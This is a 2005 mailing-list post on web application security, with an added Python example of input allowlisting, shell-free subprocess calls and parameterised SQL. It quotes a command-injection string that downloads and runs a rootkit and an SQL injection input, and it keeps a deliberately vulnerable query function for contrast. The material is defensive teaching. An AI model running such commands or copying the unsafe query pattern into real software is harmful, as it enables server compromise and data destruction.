[thelist] Securing a Web Application

Anthony Ettinger apwebdesign at yahoo.com
Tue Oct 18 19:33:25 CDT 2005


Also, parameter checking is important.

For example, don't pass form input to the command line.

Someone could inject commands like "wget url.to.root.kit; ./root.kit;"

This is how my forums were taken down a year ago with a phpbb bug.

The same goes for SQL injection as well, for example passing SQL comments + destructive queries as input.

You want a very restrictive test of the user input, allowing only valid data, rejecting everything else. This alone could have an entire book dedicated to it.


Also, at the VERY VERY least, back up your data remotely on a regular basis (I do it every 2 hours).

That goes for the files and the database server as well.

If you have access to a backup Linux box, either at home or on the server, you can cronjob a good backup utility and forget about it: www.rsnapshot.org

There's a database backup script for it which should be in the CVS repository if it's not included in the distribution file.



Anthony Ettinger
ph: (408) 656-2473
web: http://www.apwebdesign.com
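The two checks the post argues for, shown as an added example that is not part of the original message or of phpbb: a restrictive allowlist test on form input, child processes started without a shell so input can never be parsed as a command, and a parameterised query so input can never be parsed as SQL. The user table, the row data and the regex patterns are constructed for the example; the deliberately unsafe find_user_unsafe is kept only to contrast with the hardened find_user.

```python
import re
import sqlite3
import subprocess
import sys

# Allowlist patterns (constructed for this example): state exactly what valid
# input looks like and reject everything else, instead of hunting for bad bytes.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")
HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def validate(value, pattern, what):
    """Return value if it fully matches the allowlist pattern, else raise ValueError."""
    if not isinstance(value, str) or pattern.fullmatch(value) is None:
        raise ValueError(f"rejected {what}: {value!r}")
    return value


def rejects(fn, *args):
    """True if fn(*args) raises ValueError; used to show the allowlist doing its job."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


# --- Command line: form input must never reach a shell -----------------------

def build_ping_argv(host):
    """Build an argv list for a single ping; the validated host is exactly one argument."""
    host = validate(host, HOSTNAME_RE, "hostname")
    return ["ping", "-c", "1", host]


def echo_argument(value):
    """Start a child process with shell=False and return the argument as it arrived.

    The child is the Python interpreter itself (portable stand-in for echo).
    Because no shell is involved, ';' and './' in value are plain characters,
    not command separators, even when value is not validated at all.
    """
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


# --- SQL: input must never be spliced into the statement text ----------------

def make_demo_db():
    """In-memory SQLite with two constructed rows, standing in for a forum user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    conn.commit()
    return conn


def find_user_unsafe(conn, name):
    """The pattern that gets forums taken down: input concatenated into SQL.

    An input carrying a quote and an SQL comment rewrites the WHERE clause.
    """
    row = conn.execute(f"SELECT id FROM users WHERE name = '{name}'").fetchone()
    return row[0] if row else None


def find_user(conn, name):
    """Hardened: allowlist first, then a bound parameter so the input is always data."""
    name = validate(name, USERNAME_RE, "username")
    row = conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_demo_db()
    print(build_ping_argv("example.com"))
    print(echo_argument("x; wget url.to.root.kit; ./root.kit"))
    print(find_user_unsafe(conn, "x' OR 1=1 --"), find_user(conn, "alice"))
    print(rejects(find_user, conn, "x' OR 1=1 --"))
```

The order matters: validate before the value is used anywhere, and still use argv lists and bound parameters underneath, so a later loosening of the regex does not silently reopen either hole.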

